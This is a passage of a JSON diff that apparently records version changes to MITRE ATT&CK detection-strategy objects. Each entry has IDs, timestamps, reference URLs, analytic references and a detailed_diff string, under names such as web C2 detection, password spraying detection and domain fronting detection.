+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e6496b9b-2458-4616-9712-a7c0da7fd3bc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0027",
+                            "external_id": "DET0027"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Web Protocol-Based C2 Over HTTP, HTTPS, or WebSockets",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--04fe83c3-d8d3-4c96-91a4-9167fa8f405a",
+                        "x-mitre-analytic--cba23232-7fae-47df-bd83-0ca5a5066373",
+                        "x-mitre-analytic--5ff3ae40-d326-4eae-9bc5-c77ddcb6cb6e",
+                        "x-mitre-analytic--38205f16-18da-4d04-ae54-f5143b75c938",
+                        "x-mitre-analytic--1f1ed319-a6f9-4f30-9254-e0b1927a6bd9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f33df6a5-7f05-415c-9971-18918c8ed4fa",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0882",
+                            "external_id": "DET0882"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Web Services",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--da084995-0644-4152-a72d-44034845173a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--71b2e30c-f793-42a8-85be-f782c908772c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0896",
+                            "external_id": "DET0896"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Web Services",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e6500f0c-41bd-4e04-ad9d-4a3121803175"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--26fdbcb2-abc1-4844-8e5d-2c6039336cb7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0509",
+                            "external_id": "DET0509"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Web Session Cookie Theft via File, Memory, and Network Artifacts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dd105985-5d61-43f0-b69b-b4fd52632257",
+                        "x-mitre-analytic--9bcedfe7-c851-418a-b709-dd8883c7fc5e",
+                        "x-mitre-analytic--3fdd7ef4-b382-4880-9f72-bf0ad696af85",
+                        "x-mitre-analytic--916993bd-600a-43e2-abbf-30c56be84459",
+                        "x-mitre-analytic--5e1d71ce-5653-4580-a609-9832c88e2c87"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c7d19c6f-a7f8-4323-af57-c626ccb74d88",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0552",
+                            "external_id": "DET0552"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Windows Service Creation or Modification",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ffaa281c-dd99-486d-bc7f-225580f784f4"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--95d3b171-2fc3-4e58-a5c9-4d98c3691c88",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0868",
+                            "external_id": "DET0868"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Wordlist Scanning",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--56622fce-489a-4ed9-b1fb-e525939667d4"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bbda89d6-a007-4ba9-bfd0-cb03344fc540",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 14:56:39.987000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0917",
+                            "external_id": "DET0917"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Written Content",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3c500af0-d284-48c3-b23b-a22f8b77649d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-23 14:56:39.987000+00:00\", \"old_value\": \"2026-04-23T14:56:39.987Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:24:06.496Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e5eff2eb-4a41-44d1-9c79-4977fb73f569",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0055",
+                            "external_id": "DET0055"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection strategy for Group Policy Discovery on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--bf5772b8-86b4-4d73-bbff-6abb5da9edac"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6e1ea095-9f21-4544-8e9b-4fab2668033e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0343",
+                            "external_id": "DET0343"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Direct Network Flood Detection across IaaS, Linux, Windows, and macOS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0de81d5a-ffba-4eba-915d-c4f4d8b30f9a",
+                        "x-mitre-analytic--a94c1081-d66b-4009-95a9-247721fcd394",
+                        "x-mitre-analytic--a82a14f4-6fc9-43b5-b183-68af3cb075a2",
+                        "x-mitre-analytic--408b2724-079c-4636-9764-52f435726de7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--84dfca59-e541-48a8-bb95-d7581a8f48d2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0487",
+                            "external_id": "DET0487"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Distributed Password Spraying via Authentication Failures Across Multiple Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5ef73ed0-313e-4b9b-b616-8c2d02f4151a",
+                        "x-mitre-analytic--2b751817-3de2-4388-b8b9-d43b5ecda671",
+                        "x-mitre-analytic--36c2c2fb-0bea-40fe-9032-c0758d381de5",
+                        "x-mitre-analytic--0527196a-1551-445c-bdd7-943dfda9b718",
+                        "x-mitre-analytic--c35bd9de-acd9-41f9-9e4f-2a3aad461de6",
+                        "x-mitre-analytic--70500794-7d3d-4538-8e88-ed6d5e998a8a",
+                        "x-mitre-analytic--cfffc717-79f1-4aea-9e68-475ef52db11d",
+                        "x-mitre-analytic--c4a0d95a-2dfc-4b03-830e-d0dafca0be6f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--50569af3-7910-4591-977e-cbf4caa12cfd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0129",
+                            "external_id": "DET0129"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Domain Account Enumeration Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8f0ac116-4c8a-4819-b7c0-744e05d672c9",
+                        "x-mitre-analytic--4bad86cf-6cab-46f4-8748-28dc8c8ec81b",
+                        "x-mitre-analytic--ef50b854-172a-457b-9d0e-c95d9835eaaa"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--92203cb2-b7bd-4bc3-ab6f-9859a9856efc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0196",
+                            "external_id": "DET0196"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Domain Fronting Behavior via Mismatched TLS SNI and HTTP Host Headers",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e5cb92b6-75b0-4eed-aa1e-4ea529f50fbb",
+                        "x-mitre-analytic--e031d1a5-92a9-46df-9467-d6899d48f57b",
+                        "x-mitre-analytic--b4cf91ba-a22b-49b4-978e-32c3e1301c74",
+                        "x-mitre-analytic--4192b311-da7a-4ef1-b09a-a03a8c2a1670"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a070f9d2-3480-4362-99b3-8b36f5be0189",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0176",
+                            "external_id": "DET0176"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Drive-by Compromise \u2014 Behavior-based, Multi-platform Detection Strategy (T1189)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--35701083-a327-4f68-a426-13751b9743c3",
+                        "x-mitre-analytic--32b5b330-2a40-4117-8999-395c23490614",
+                        "x-mitre-analytic--230a55ce-4584-4588-a006-5532a9efdbd8",
+                        "x-mitre-analytic--3154acf3-a5df-40bd-b4bc-3a210b6e5e0e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2470975e-6748-42a5-9a48-74dc7b687fe9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0476",
+                            "external_id": "DET0476"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Email Collection via Local Email Access and Auto-Forwarding Behavior",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4f15b707-9b44-4716-bfcd-e3f28659077b",
+                        "x-mitre-analytic--ba43428d-b5d2-4815-a614-42ff1ea816a9",
+                        "x-mitre-analytic--ae581308-5c1f-40b9-ae6e-51c375821476",
+                        "x-mitre-analytic--2faaefb9-7816-4eb5-a9f5-b4006c99c20b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f66a9e86-49fb-4de6-963d-0e357a77f679",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0576",
+                            "external_id": "DET0576"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Email Forwarding Rule Abuse Detection Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fe489775-b01e-4da2-a0e2-962d1572ba09",
+                        "x-mitre-analytic--c93edcb2-385a-4472-a9db-ace5371250eb",
+                        "x-mitre-analytic--710aa303-3e9f-4170-95a4-b2caf5f827fd",
+                        "x-mitre-analytic--22e6f5f4-e4cc-449c-9dba-280788935ce5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d70b8fdd-de14-4143-a350-56e3b885b37b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0087",
+                            "external_id": "DET0087"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Encrypted or Encoded File Payload Detection Strategy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4f985435-9144-4a8f-aca0-598f788855b7",
+                        "x-mitre-analytic--e9de9003-46e9-438f-929a-94a33c2eb5bd",
+                        "x-mitre-analytic--0e832ea1-a261-4bdd-8fc8-ae049468c347"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bdf67026-8adb-41da-9a58-c9acba4da1f3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
